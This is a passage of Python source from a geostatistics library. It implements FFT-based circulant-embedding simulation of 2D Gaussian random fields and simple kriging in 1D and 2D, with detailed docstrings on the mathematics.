uEmb = np.zeros(N)
uEmb[indcEmb] = np.linalg.solve(rAA, v)
Z = np.fft.ifft(lam * np.fft.fft(uEmb))
# ...note that Im(Z) = 0
krig[indnc] = np.real(Z[indncEmb])
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE1D: computing kriging standard deviation ...')
for j in range(nnc):
u = ccirc[np.mod(indc - indnc[j], N)] # j-th row of rBA
krigSD[indnc[j]] = np.dot(u,np.linalg.solve(rAA, u))
del(ccirc)
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
# ... update if non stationary covariance is specified
if var is not None:
if var.size > 1:
krig = varUpdate * krig
if computeKrigSD:
krigSD = varUpdate * krigSD
krig = krig + mean
if computeKrigSD:
return ([krig, krigSD])
else:
return (krig)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf2D(cov_model, dimension, spacing, origin=[0., 0.],
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 2D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 2, or
1-dimensional array of dim 2) are 2D-lag(s)
(CovModel2D class) covariance model in 2D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 2 ints) [nx, ny], number of cells
in x-, y-axis direction
:param spacing: (sequence of 2 float) [dx, dy], spacing between
two adjacent cells in x-, y-axis direction
:param origin: (sequence of 2 float) [ox, oy], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny values (reshaped if needed)
:param x: (2-dimensional array of dim n x 2, or
1-dimensional array of dim 2 or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (length n)
:param extensionMin: (sequence of 2 ints) minimal extension in nodes in
in x-, y-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B: NOT IMPLEMENTED!!!
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (3-dimensional array of dim nreal x n2 x n1) nreal GRFs
with n1 = nx, n2 = ny if crop = True,
and n1 >= nx, n2 >= ny otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 is given by
c = DFT(x) = F * x
where F is the the (N1*N2) x (N1*N2) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2) )], j=(j1,j2), k=(k1,k2) in G,
and
G = {n=(n1,n2), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1}
denotes the indices grid
and where we use the bijection
(n1,n2) in G -> n1 + n2 * N1 in {0,...,N1*N2-1},
between the multiple-indices and the single indices
With N = N1*N2, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft2() = DFT
numpy.fft.ifft2() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel2D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF2D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF2D: Preliminary computation...')
#### Preliminary computation ####
nx, ny = dimension
dx, dy = spacing
# ox, oy = origin
nxy = nx*ny
if method not in (1, 2, 3):
print('ERROR (GRF2D): invalid method')
return
if method == 2:
print('ERROR (GRF2D): Unconditional simulation: "method=2" not implemented...')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF2D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1,2) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxy:
print('ERROR (GRF2D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxy:
print('ERROR (GRF2D): number of entry for "var"...')
return
var = np.asarray(var).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF2D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF2D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF2D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxy(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1]
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
if printInfo:
print('GRF2D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
N1 = int(2**g1)
N2 = int(2**g2)
if printInfo:
print('GRF2D: Embedding dimension: {} x {}'.format(N1, N2))
N = N1*N2
# ccirc: coefficient of the embedding matrix (N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
hh = np.meshgrid(h1, h2)
ccirc = cov_func(np.hstack((hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N2, N1)
del(h1, h2, hh)
# ...shift first L1 index to the end of the axis 1:
ind = np.arange(L1)
ccirc = ccirc[:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 0:
ind = np.arange(L2)
ccirc = ccirc[np.hstack((ind+L2, ind)), :]
del(ind)
if printInfo:
print('GRF2D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (2-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2), 0<=k1<=N1-1, 0<=k2<=N2-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2) = lam(N1-k1,N2-k2), 1<=k1<=N1-1, 1<=k2<=N2-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft2(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(2)))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF2D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF2D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 2
ix, iy = indc[:, 0], indc[:, 1]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (GRF2D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (GRF2D): a conditioning point is out of the grid (y-direction)')
return
indc = ix + iy * nx # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (GRF2D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF2D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxy), indc), dtype=int)
nnc = len(indnc)
ky = np.floor_divide(indnc, nx)
kx = np.mod(indnc, nx)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF2D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
if printInfo:
print('GRF2D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate.reshape(-1)[indnc] * np.transpose(1./varUpdate.reshape(-1)[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF2D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iy * N1 + ix
indncEmb = ky * N1 + kx
del(ix, iy, kx, ky)
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (2D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# Not implemented
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (2D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx, grfNy = nx, ny
else:
grfNx, grfNy = N1, N2
grf = np.zeros((nreal, grfNy, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF2D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=(N2, N1))
Z = np.fft.ifft2(lamSqrt * np.fft.fft2(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNy, 0:grfNx])
elif method == 2:
# Method B
# --------
print('ERROR (GRF2D): Unconditional simulation: "method=2" not implemented...')
return
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF2D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=(N2, N1)), dtype=complex)
W.imag = np.random.normal(size=(N2, N1))
Z = np.sqrt(N) * np.fft.ifft2(lamSqrt * W)
# Z = 1/np.sqrt(N) * np.fft.fft2(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNy, 0:grfNx])
grf[i+1] = np.imag(Z[0:grfNy, 0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF2D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=(N2, N1))
Z = np.fft.ifft2(lamSqrt * np.fft.fft2(W))
# ...note that Im(Z) = 0
grf[nreal-1] = np.real(Z[0:grfNy, 0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
# We work with single indices...
grf.resize(nreal, grfNx*grfNy)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF2D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N2*N1)
for i in range(nreal):
if printInfo:
print('GRF2D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate.reshape(-1)[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifft2(lam * np.fft.fft2(rAAinvResiduEmb.reshape(N2, N1)))
# ...note that Im(Z) = 0
Z = np.real(Z.reshape(-1)[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate.reshape(-1)[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
# Reshape grf as initially
grf.resize(nreal, grfNy, grfNx)
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige2D(x, v, cov_model, dimension, spacing, origin=[0., 0.],
mean=0, var=None,
extensionMin=None,
conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
measureErrVar=0., tolInvKappa=1.e-10,
computeKrigSD=True,
printInfo=True):
"""
Computes kriging estimates and standard deviation in 2D via FFT.
It is a simple kriging
- of value v at location x,
- based on the covariance model / function,
- with a specified mean (mean) and variance (var), which can be non stationary
Notes:
1) For reproducing covariance model, the dimension of field/domain should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large data set:
- conditioningMethod should be set to 2 for using FFT
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix (solving linear system)
:param x: (2-dimensional array array of dim n x 2) coordinate of data points
:param v: (1-dimensional array length n) value at data points
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 2, or
1-dimensional array of dim 2) are 2D-lag(s)
(CovModel2D class) covariance model in 2D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 2 ints) [nx, ny], number of cells
in x-, y-axis direction
:param spacing: (sequence of 2 float) [dx, dy], spacing between
two adjacent cells in x-, y-axis direction
:param origin: (sequence of 2 float) [ox, oy], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny values (reshaped if needed)
:param extensionMin: (sequence of 2 ints) minimal extension in nodes in
in x-, y-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as third argument)
:param conditioningMethod:
(int) indicates which method is used to perform kriging.
Let
A: index of conditioning (data) nodes
B: index of non-conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, thre kriging estimates and variance are
krig[B] = mean + rBA * rAA^(-1) * (v - mean)
krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
The computation is done in a way depending on the
following possible values for conditioningMethod:
1: method CondtioningA:
the matrices rBA, RAA^(-1) are explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for kriging estimates:
the linear system
rAA * y = (v - mean)
is solved, and then
mean + rBA*y
is computed
for kriging variances:
for each column u[j] of rAB, the linear
system
rAA * y = u[j]
is solved, and then
rBB[j,j] - y^t*y
is computed
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
:param tolInvKappa: (float >0) the function is stopped if the inverse of
the condition number of rAA is above tolInvKappa
:param computeKrigSD:
(bool) indicates if the standard deviation of kriging is computed
:param printInfo: (bool) indicates if some info is printed in stdout
:return ret: two possible cases:
ret = [krig, krigSD] if computeKrigSD is equal to True
ret = krig if computeKrigSD is equal to False
where
krig: (2-dimensional array of dim ny x nx)
kriging estimates
krigSD: (2-dimensional array of dim ny x nx)
kriging standard deviation
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 is given by
c = DFT(x) = F * x
where F is the the (N1*N2) x (N1*N2) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2) )], j=(j1,j2), k=(k1,k2) in G,
and
G = {n=(n1,n2), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1}
denotes the indices grid
and where we use the bijection
(n1,n2) in G -> n1 + n2 * N1 in {0,...,N1*N2-1},
between the multiple-indices and the single indices
With N = N1*N2, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft2() = DFT
numpy.fft.ifft2() = DFT^(-1)
"""
# Check third argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel2D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (third argument) is not valid")
return
# Check conditioning method
if conditioningMethod not in (1, 2):
print('ERROR (KRIGE2D): invalid method!')
return
nx, ny = dimension
dx, dy = spacing
# ox, oy = origin
nxy = nx*ny
x = np.asarray(x).reshape(-1,2) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxy:
print('ERROR (KRIGE2D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxy:
print('ERROR (KRIGE2D): number of entry for "var"...')
return
var = np.asarray(var).reshape(ny, nx) # cast in 2-dimensional array of same shape as grid
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxy(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1]
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
if printInfo:
print('KRIGE2D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
N1 = int(2**g1)
N2 = int(2**g2)
if printInfo:
print('KRIGE2D: Embedding dimension: {} x {}'.format(N1, N2))
N = N1*N2
# ccirc: coefficient of the embedding matrix (N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
hh = np.meshgrid(h1, h2)
ccirc = cov_func(np.hstack((hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N2, N1)
del(h1, h2, hh)
# ...shift first L1 index to the end of the axis 1:
ind = np.arange(L1)
ccirc = ccirc[:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 0:
ind = np.arange(L2)
ccirc = ccirc[np.hstack((ind+L2, ind)), :]
del(ind)
if printInfo:
print('KRIGE2D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (2-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2), 0<=k1<=N1-1, 0<=k2<=N2-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2) = lam(N1-k1,N2-k2), 1<=k1<=N1-1, 1<=k2<=N2-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft2(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(2)))
# Kriging
# -------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, the kriging estimates are
# mean + rBA * rAA^(-1) * (v - mean)
# and the kriging standard deviation
# diag(rBB - rBA * rAA^(-1) * rAB)
# Compute the part rAA of the covariance matrix
# Note: if a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# which is accounting in the computation of kriging estimates and standard
# deviation below
if printInfo:
print('KRIGE2D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 2
ix, iy = indc[:, 0], indc[:, 1]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (KRIGE2D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (KRIGE2D): a conditioning point is out of the grid (y-direction)')
return
indc = ix + iy * nx # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (KRIGE2D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF2D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxy), indc), dtype=int)
nnc = len(indnc)
ky = np.floor_divide(indnc, nx)
kx = np.mod(indnc, nx)
# Initialize
krig = np.zeros(ny*nx)
if computeKrigSD:
krigSD = np.zeros(ny*nx)
if mean.size == 1:
v = v - mean
else:
v = v - mean.reshape(-1)[indc]
if var is not None and var.size > 1:
v = 1./varUpdate.reshape(-1)[indc] * v
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('KRIGE2D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
del(ix, iy, kx, ky)
del(ccirc)
if printInfo:
print('KRIGE2D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA)
if not computeKrigSD:
del(rBA)
# Compute kriging estimates
if printInfo:
